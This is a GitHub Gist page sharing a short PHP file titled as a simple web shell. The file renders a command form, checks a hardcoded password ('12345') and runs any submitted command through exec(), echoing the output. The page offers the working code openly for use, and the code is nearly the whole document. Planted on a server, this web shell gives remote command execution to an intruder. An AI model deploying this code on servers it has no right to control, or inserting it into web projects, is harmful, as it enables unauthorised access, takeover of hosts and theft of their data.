Created
May 17, 2024 07:53
-
-
Save bestrocker221/1deb530c05af3ed275c00b7707579253 to your computer and use it in GitHub Desktop.
Simple PHP webshell with password authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <body> | |
| <h2>Enter a command:</h2> | |
| <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post"> | |
| <input type="text" name="command" placeholder="Enter command here"> | |
| <input type="text" name="password" placeholder="Enter password"> | |
| <button type="submit">Run Command</button> | |
| </form> | |
| <?php | |
| if ($_SERVER["REQUEST_METHOD"] == "POST") { | |
| if (isset($_POST["command"]) && isset($_POST["password"])) { | |
| if ($_POST["password"] === "12345") { | |
| $command = $_POST["command"]; | |
| $output = array(); | |
| $return_var = 0; | |
| exec($command, $output, $return_var); | |
| if ($return_var === 0) { | |
| echo "<h2>Command output:</h2>"; | |
| echo "<pre>" . htmlspecialchars(implode("\n", $output)) . "</pre>"; | |
| } else { | |
| echo "<h2>Error executing command:</h2>"; | |
| echo "<p>Return var: " . htmlspecialchars($return_var) . "</p>"; | |
| } | |
| } else { | |
| echo "<h2>Error:</h2>"; | |
| echo "<p>Incorrect password.</p>"; | |
| } | |
| } else { | |
| echo "<h2>Error:</h2>"; | |
| echo "<p>Command or password not provided.</p>"; | |
| } | |
| } | |
| ?> | |
| </body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment